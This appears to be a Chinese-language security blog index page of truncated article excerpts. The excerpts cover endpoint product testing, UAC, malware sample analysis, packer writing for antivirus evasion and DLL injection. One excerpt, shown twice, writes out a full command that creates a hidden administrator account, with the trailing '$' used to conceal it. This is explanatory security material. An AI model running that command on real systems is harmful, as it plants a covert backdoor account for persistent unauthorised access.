写在前面：文章最后，对所有被测安全产品做了总结，大家可以直接查看结果，了解目前端点安全产品的能力情况。4.17 McAfee Endpoint Protection McAfee Endpoint Protection是最...

1.UAC用户帐户控制（User Account Control，简写作UAC)是微软公司在其[Windows Vista](https://baike.baidu.com/item/Windows Vista)及更高版本操作系统中采用的一种控制机制，保...

概述该样本是来自于VirusShare网站提供，于2022年3月15日在VirusTotal上被首次提交。拿到样本时只有一个dll文件，查看其资源节，发现有“XHtmlTreeTest.exe”等字符串信息，经网上...

前言前段时间自己学习了一下壳的编写，发现网上相关资料不是非常全，而且讲解顺序不太对胃口。因此参考了《黑客免杀攻防》中的代码对DLL型壳编写的结构进行了一次归纳整理，并附...

前言dll 注入技术是让某个进程主动加载指定的 dll 的技术。恶意软件为了提高隐蔽性，通常会使用 dll 注入技术将自身的恶意代码以 dll 的形式注入高可信进程。常规的 dll 注入...

0x1 匿名用户net user administrator$ woaijiushi /add && net localgroup administrators administrator$ /add PS：通过在用户后面添加$符号的形式将用户达到隐藏的效果。可...

0x1 匿名用户net user administrator$ woaijiushi /add && net localgroup administrators administrator$ /add PS：通过在用户后面添加$符号的形式将用户达到隐藏的效果。可...